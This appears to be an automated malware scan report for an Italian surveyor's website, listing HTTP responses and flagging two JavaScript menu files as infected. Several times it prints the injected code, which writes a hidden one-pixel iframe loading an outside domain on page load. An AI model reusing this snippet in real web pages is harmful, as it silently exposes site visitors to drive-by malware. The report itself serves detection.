Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geometrabrandi.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://geometrabrandi.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 05:43:49 GMT Location: http://www.geometrabrandi.it/ Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.geometrabrandi.it/ | 200 OK Content-Length: 17403 Content-Type: text/html | clean |
http://www.geometrabrandi.it/menu/stmenu.js | 200 OK Content-Length: 22633 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})(); Antivirus reports:
| ||
http://geometrabrandi.it/menu/michele.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 05:43:49 GMT Location: http://www.geometrabrandi.it/menu/michele.js Server: Apache Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.geometrabrandi.it/menu/michele.js | 200 OK Content-Length: 16651 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})(); Antivirus reports:
| ||
http://geometrabrandi.it/acca/plus/corsi_formazione.asp | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 05:43:50 GMT Location: http://www.geometrabrandi.it/acca/plus/corsi_formazione.asp Server: Apache Content-Length: 267 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.geometrabrandi.it/acca/plus/corsi_formazione.asp | 200 OK Content-Length: 16024 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/amicus.asp | 200 OK Content-Length: 25327 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/../../menu/stmenu.js | 200 OK Content-Length: 22633 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})(); Antivirus reports:
| ||
http://www.geometrabrandi.it/acca/plus/../../menu/michele.js | 200 OK Content-Length: 16651 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})(); Antivirus reports:
| ||
http://www.geometrabrandi.it/acca/plus/primus_tk.asp | 200 OK Content-Length: 19660 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/certus_tk.asp | 200 OK Content-Length: 16072 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/autocad_tk.asp | 200 OK Content-Length: 23623 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/../../applications/download/Default.asp?CustomerID=1&GroupID=67 | 200 OK Content-Length: 10513 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/../../applications/download/../../menu/stmenu.js | 200 OK Content-Length: 22633 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})(); Antivirus reports:
| ||
http://www.geometrabrandi.it/acca/plus/../../applications/download/../../menu/michele.js | 200 OK Content-Length: 16651 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})(); Antivirus reports:
| ||
http://www.geometrabrandi.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.geometrabrandi.it/acca/plus/../../applications/order/Default.asp?CustomerID=1&GroupID=67 | 200 OK Content-Length: 10495 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geometrabrandi.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 05:43:49 GMT
Location: http://www.geometrabrandi.it/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
GET / HTTP/1.1
Host: geometrabrandi.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 05:43:49 GMT
Location: http://www.geometrabrandi.it/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: geometrabrandi.it
Referer: http://www.google.com/search?q=geometrabrandi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: geometrabrandi.it
Referer: http://www.google.com/search?q=geometrabrandi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.